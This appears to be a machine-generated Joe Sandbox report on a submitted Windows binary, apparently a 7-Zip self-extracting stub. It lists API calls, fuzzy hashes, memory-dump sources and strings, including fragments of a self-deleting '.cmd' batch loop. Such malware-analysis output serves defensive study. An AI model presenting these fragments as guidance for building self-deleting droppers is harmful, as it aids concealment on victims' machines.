                                                                      • Opcode Fuzzy Hash: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
                                                                      • Instruction Fuzzy Hash: 7FB09230544700FEEF224B00DE09B8A76A0ABC0B05F30C528B188641F087B56804EA09
                                                                      APIs
                                                                      • _wtol.MSVCRT ref: 00403882
                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,DF20E863,00000000,xu_,00000000,H|_), ref: 00403925
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403996
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 0040399E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004039A6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 004039AE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 004039B6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 004039BE
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 004039C6
                                                                      • _wtol.MSVCRT ref: 00403A1C
                                                                      • CoCreateInstance.OLE32(00416E70,00000000,00000001,00416E30,00405712,.lnk,?,0000005C), ref: 00403ABD
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403B55
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403B5D
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403B65
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403B6D
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403B75
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403B7D
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403B85
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403B8B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403B93
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                      • String ID: .lnk$H|_$xu_
                                                                      • API String ID: 408529070-3512132489
                                                                      • Opcode ID: cf4a75b7d2df8ab8d94b29a73fb7e55b3673f3da2728c2876b416c30fcf727c8
                                                                      • Instruction ID: 6a4e2cb34307125d1aa254537a73282d765d300cba51a9a08192486ca10ed339
                                                                      • Opcode Fuzzy Hash: cf4a75b7d2df8ab8d94b29a73fb7e55b3673f3da2728c2876b416c30fcf727c8
                                                                      • Instruction Fuzzy Hash: 4DA18E71D10249ABDF14EFA1CC469EEBB78FF1430AF50442AF406B71A1DB389A42DB18
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                      • wsprintfW.USER32 ref: 004021E7
                                                                      • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                      • GetLastError.KERNEL32 ref: 00402201
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                      • GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                      • GetLastError.KERNEL32 ref: 00402236
                                                                      • lstrcmpiW.KERNEL32(02533FD0,00404926), ref: 0040224B
                                                                      • ??3@YAXPAX@Z.MSVCRT(02533FD0), ref: 0040225B
                                                                      • ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                      • SetLastError.KERNEL32(?), ref: 00402282
                                                                      • lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                      • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                      • _wtol.MSVCRT ref: 00402314
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,02533FD0,00000002), ref: 00402334
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                      • String ID: 7zSfxString%d
                                                                      • API String ID: 2117570002-3906403175
                                                                      • Opcode ID: 21ae09bf32348a84b5a2f2e54b5b9e7d108aa2b47e227baa09689f935d6fe57e
                                                                      • Instruction ID: 10ef73f62a445f8617660be723e0bbad3c81975cf04d4be1a7303cf9b6c1a78d
                                                                      • Opcode Fuzzy Hash: 21ae09bf32348a84b5a2f2e54b5b9e7d108aa2b47e227baa09689f935d6fe57e
                                                                      • Instruction Fuzzy Hash: 82518171900604EFDB219FB5DD59BDABBB9EB48350B10807EE64EE62D0D774AD40CB28
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                      • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                      • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                      • LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                      • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401E57
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401E60
                                                                      • wsprintfW.USER32 ref: 00401E7F
                                                                      • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401E94
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401E97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                      • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                      • API String ID: 2639302590-365843014
                                                                      • Opcode ID: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                                      • Instruction ID: f9dda1162ec2f24eaafa78ee80fe21c3398d892f55d41869619f642ebc926886
                                                                      • Opcode Fuzzy Hash: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
                                                                      • Instruction Fuzzy Hash: B5214C72900608FBDB119FA4DC08FDF3ABDEB84711F158426FA05A6291D7B89D40CBA8
                                                                      APIs
                                                                      • wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                      • GetLastError.KERNEL32 ref: 00408DF4
                                                                      • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                      • lstrlenW.KERNEL32(?), ref: 00408E44
                                                                      • lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                      • lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                      • LocalFree.KERNEL32(?), ref: 00408E9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                      • String ID:
                                                                      • API String ID: 829399097-0
                                                                      • Opcode ID: 4faf531a358f257a6781f4b9a7a74002cf67e8eef782f1a4dd5a9a84c920668d
                                                                      • Instruction ID: c91527b0869a4d5de4249670dcf9d0912663d9707098e08fcc2f2580e19cfeee
                                                                      • Opcode Fuzzy Hash: 4faf531a358f257a6781f4b9a7a74002cf67e8eef782f1a4dd5a9a84c920668d
                                                                      • Instruction Fuzzy Hash: 41218176800208FFDB149FA0DD85DEB7BACEF44354B10807BF945A6190EF34AE858BA4
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,004155D0,?,?,?,00000000), ref: 00402F15
                                                                      • lstrcmpW.KERNEL32(?,004155CC,?,0000005C,?,?,?,00000000), ref: 00402F68
                                                                      • lstrcmpW.KERNEL32(?,004155C4,?,?,00000000), ref: 00402F7E
                                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402F94
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402F9B
                                                                      • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402FAD
                                                                      • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402FBC
                                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402FC7
                                                                      • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402FD0
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FDB
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FE6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                      • String ID:
                                                                      • API String ID: 1862581289-0
                                                                      • Opcode ID: b5d7478b488ab07fa35e0d914aff9eae8d9a73ce57448807aa14b1ac9d27a7f6
                                                                      • Instruction ID: e3ea1660441bcf3a3f7f20395b47020d8d3d19c9c96888f58badb5dcc8a6e628
                                                                      • Opcode Fuzzy Hash: b5d7478b488ab07fa35e0d914aff9eae8d9a73ce57448807aa14b1ac9d27a7f6
                                                                      • Instruction Fuzzy Hash: 7A218631A04209FBDB11AB71DD8DFEF3B7CAF44745F50407AB805B21D0EBB89A459A68
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 0040864F
                                                                      • SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00408669
                                                                      • SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
                                                                      • EndDialog.USER32(?,00000000), ref: 0040869A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentHookThreadWindows$Dialog
                                                                      • String ID:
                                                                      • API String ID: 1967849563-0
                                                                      • Opcode ID: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                                      • Instruction ID: a1df587bc44f7b8848174d41fcc6ca6bf5c09d6170abc4bd78dad765c28a629c
                                                                      • Opcode Fuzzy Hash: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                                      • Instruction Fuzzy Hash: 93012671600218DFD3106B7AED44AB3F7ECEB85755B12843FE202921A0CAB79C008F6C
                                                                      APIs
                                                                      • AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
                                                                      • FreeSid.ADVAPI32(?), ref: 004024A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      • Opcode ID: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                                      • Instruction ID: fcbafef67fd355d70295d2c1b6ce6e7585022550186800af39a78ba60eef4ec0
                                                                      • Opcode Fuzzy Hash: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                                      • Instruction Fuzzy Hash: F7F03C72944288FEDB01DBE88D85ADEBF7CAB18304F8480AAA101A2182D2705704CB69
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                      • Instruction ID: 1deff6650f640bb2d9dcab77f147087c60d03763b1f3dd6742a57df9d51469cf
                                                                      • Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                      • Instruction Fuzzy Hash: 5F022B72A043124BDB09CE28C59027DBBE2FBC4345F150A3EE89667BC4D7789954C7DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                      • Instruction ID: d276be45ba9710969d4d69a2fbd68599cb80de3b2bdcae4a446b37c04d3c8c9c
                                                                      • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                      • Instruction Fuzzy Hash: 6A41C360C14B9652EB134F7CC842272B320BFAB244F00D75AFDD179922FB3266446255
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                                      • Instruction ID: 6fc8e050a97d926f750d5da14c4a761a5f22703977f0277d1b92a118b0bcd8c9
                                                                      • Opcode Fuzzy Hash: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                                      • Instruction Fuzzy Hash: 2F212E7B370D4607EB0C8939AE336BE2582E340346F88953DD247C5784EE9E9954810D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                      • Instruction ID: 593f74aba8cbd25357504dd2d18fce0fb38989f15731237b119c96727be92a00
                                                                      • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                      • Instruction Fuzzy Hash: 7521C53291462547CB02CE6EE4845A7F392FFC436BF174767ED8467290C629A85486E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                      • Instruction ID: f31e75e8446499c6638a38678b48eff386f2da62f80cbfd2527233499c21bf4b
                                                                      • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                      • Instruction Fuzzy Hash: 21213B7291842587C701DF1DE4886B7B3E1FFC431AF678A3BD9828B182C638E885D794
                                                                      APIs
                                                                      • GetCommandLineW.KERNEL32(?,?,?), ref: 0040505F
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00405122
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0040512A
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00405132
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 0040513A
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 00405142
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040514A
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00405152
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040515A
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00405162
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040516A
                                                                      • GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405183
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004051B4
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004051BF
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004051C7
                                                                      • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
                                                                      • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
                                                                      • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00405203
                                                                      • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
                                                                      • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
                                                                      • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040524C
                                                                      • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405255
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040525C
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040526B
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00405274
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040527F
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0040528B
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405292
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040529D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                                      • String ID: " -$sfxwaitall
                                                                      • API String ID: 2734624574-3991362806
                                                                      • Opcode ID: c576ddda3cb22813f92d1ea0a50b073aab1b0f041d900a3914aafabf44139407
                                                                      • Instruction ID: b3327515afe2f0509fed3fa0d446ddd4546a9b02c844584286d91d1d95b89973
                                                                      • Opcode Fuzzy Hash: c576ddda3cb22813f92d1ea0a50b073aab1b0f041d900a3914aafabf44139407
                                                                      • Instruction Fuzzy Hash: 73614DB2800148BBDF11BFA1DC45EDF3B6CFF54308F10853AFA15A21A1DA399A559F68
                                                                      APIs
                                                                      • GetDriveTypeW.KERNEL32(?,?,00000000), ref: 0040534B
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
                                                                      • WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040543C
                                                                      • CloseHandle.KERNEL32(00419858), ref: 00405445
                                                                      • SetFileAttributesW.KERNEL32(00406D05,00000000), ref: 0040545C
                                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405477
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405483
                                                                      • ??3@YAXPAX@Z.MSVCRT(00406D05,?), ref: 00405489
                                                                      • ??3@YAXPAX@Z.MSVCRT(00406D05,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00406D05,00419858), ref: 004054B7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                      • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
